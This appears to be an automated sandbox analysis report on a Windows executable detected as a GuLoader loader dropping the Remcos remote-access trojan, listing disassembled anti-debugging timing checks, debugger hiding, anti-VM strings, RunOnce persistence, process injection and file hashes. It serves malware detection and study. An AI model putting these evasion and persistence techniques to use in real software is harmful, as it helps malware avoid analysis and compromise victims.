Source: C:\Users\user\Desktop\pRcHGlVekw.exe	RDTSC instruction interceptor: First address: 0000000000567EBB second address: 0000000000567EBB instructions: 0x00000000 rdtsc 0x00000002 mov eax, 01B6460Dh 0x00000007 xor eax, BEFED3B1h 0x0000000c sub eax, 17554910h 0x00000011 add eax, 580CB355h 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007F4E1C9F6F80h 0x0000001e lfence 0x00000021 mov edx, 1889B9A2h 0x00000026 xor edx, A7C3F6EDh 0x0000002c add edx, 20E9D255h 0x00000032 xor edx, 9FCA21B0h 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d test dh, 0000006Eh 0x00000040 test cx, cx 0x00000043 cmp cx, dx 0x00000046 ret 0x00000047 sub edx, esi 0x00000049 ret 0x0000004a test dh, ah 0x0000004c add edi, edx 0x0000004e dec dword ptr [ebp+000000F8h] 0x00000054 cmp dword ptr [ebp+000000F8h], 00000000h 0x0000005b jne 00007F4E1C9F6E7Ah 0x0000005d call 00007F4E1C9F6EDDh 0x00000062 call 00007F4E1C9F6FA1h 0x00000067 lfence 0x0000006a mov edx, 1889B9A2h 0x0000006f xor edx, A7C3F6EDh 0x00000075 add edx, 20E9D255h 0x0000007b xor edx, 9FCA21B0h 0x00000081 mov edx, dword ptr [edx] 0x00000083 lfence 0x00000086 test dh, 0000006Eh 0x00000089 test cx, cx 0x0000008c cmp cx, dx 0x0000008f ret 0x00000090 mov esi, edx 0x00000092 pushad 0x00000093 rdtsc
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	RDTSC instruction interceptor: First address: 0000000000567FF6 second address: 0000000000567FF6 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, DFFADC29h 0x00000013 xor eax, 5D423971h 0x00000018 xor eax, 6D1D2D19h 0x0000001d add eax, 105A37C0h 0x00000022 cpuid 0x00000024 psubd mm7, mm2 0x00000027 bt ecx, 1Fh 0x0000002b jc 00007F4E1C91B0F3h 0x00000031 popad 0x00000032 call 00007F4E1C91ABBEh 0x00000037 lfence 0x0000003a rdtsc

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

Code function: 1_2_02187EB3 rdtsc

1_2_02187EB3

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

Window / User API: foregroundWindowGot 547

Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\pRcHGlVekw.exe TID: 5624	Thread sleep count: 276 > 30			Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe TID: 5624	Thread sleep time: -138000s >= -30000s			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Last function: Thread delayed

Source: pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=\UNDERDEVELOPED.exe\HOMOTYPYSet W = CreateObject("WScript.Shell")
Source: pRcHGlVekw.exe, 00000001.00000002.344662425.0000000002190000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll\UNDERDEVELOPED.exe\HOMOTYPYSoftware\Microsoft\Windows\CurrentVersion\RunOnceDRAWSPAN
Source: pRcHGlVekw.exe, 00000001.00000002.344662425.0000000002190000.00000004.00000001.sdmp, pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

System information queried: ModuleInformation

Jump to behavior

Anti Debugging:

Hides threads from debuggers

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Thread information set: HideFromDebugger	Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process queried: DebugPort			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

Code function: 1_2_02187EB3 rdtsc

1_2_02187EB3

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

Code function: 1_2_02186663 LdrInitializeThunk,

1_2_02186663

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02188817 mov eax, dword ptr fs:[00000030h]	1_2_02188817
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02182EC2 mov eax, dword ptr fs:[00000030h]	1_2_02182EC2
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02187540 mov eax, dword ptr fs:[00000030h]	1_2_02187540
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02183944 mov eax, dword ptr fs:[00000030h]	1_2_02183944
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02187BB8 mov eax, dword ptr fs:[00000030h]	1_2_02187BB8
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_021855ED mov eax, dword ptr fs:[00000030h]	1_2_021855ED

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

Process created: C:\Users\user\Desktop\pRcHGlVekw.exe 'C:\Users\user\Desktop\pRcHGlVekw.exe'

Jump to behavior

Source: pRcHGlVekw.exe, 00000010.00000002.1300934977.0000000000FB0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: pRcHGlVekw.exe, 00000010.00000002.1300934977.0000000000FB0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: pRcHGlVekw.exe, 00000010.00000002.1300934977.0000000000FB0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: logs.dat.16.dr	Binary or memory string: [ Program Manager ]
Source: pRcHGlVekw.exe, 00000010.00000002.1300934977.0000000000FB0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Stealing of Sensitive Information:

GuLoader behavior detected

Source: Initial file

Signature Results: GuLoader behavior

Yara detected Remcos RAT

Source: Yara match

File source: 00000010.00000002.1300727955.00000000008E8000.00000004.00000020.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Remcos RAT

Source: Yara match

File source: 00000010.00000002.1300727955.00000000008E8000.00000004.00000020.sdmp, type: MEMORY

ID:	458794
Product:	CloudBasic
Start time:	18:58:35
Start date:	03.08.2021
Sample:	pRcHGlVekw.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	d2cb32f7c7f384b4baa8dd13d6b5bbab
SHA1:	355acb5af5caaeb59fd7c9e0a54b501c24d47919
SHA256:	2bd846bdda945dc48a21c9bda1497feb9e67df8cfb024cc8669041490c7c9a90
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.exe	PE32 executable (GUI) Intel 80386, for MS Windows	D2CB32F7C7F384B4BAA8DD13D6B5BBAB	355ACB5AF5CAAEB59FD7C9E0A54B501C24D47919	2BD846BDDA945DC48A21C9BDA1497FEB9E67DF8CFB024CC8669041490C7C9A90
C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.vbs	ASCII text, with CRLF line terminators	FCA010003BC83A3D0D5FA585F5B62900	2F0FEECD1CE61F34A74174844E09A5AA06FB748D	C0329C71251FD21B5E0060D8AA0ADB702848B6B88EF451D33C1A72CF6532F4DC
C:\Users\user\AppData\Roaming\remcos\logs.dat	data	11433C9F76522D182E47B45E4AD5FD05	323674941D097ED5A15FBB6D3047240107922107	21F21F6860F7D09D401BC84C2117167B91F15A8D22398893A6D189384764C157

Windows Analysis Report pRcHGlVekw.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs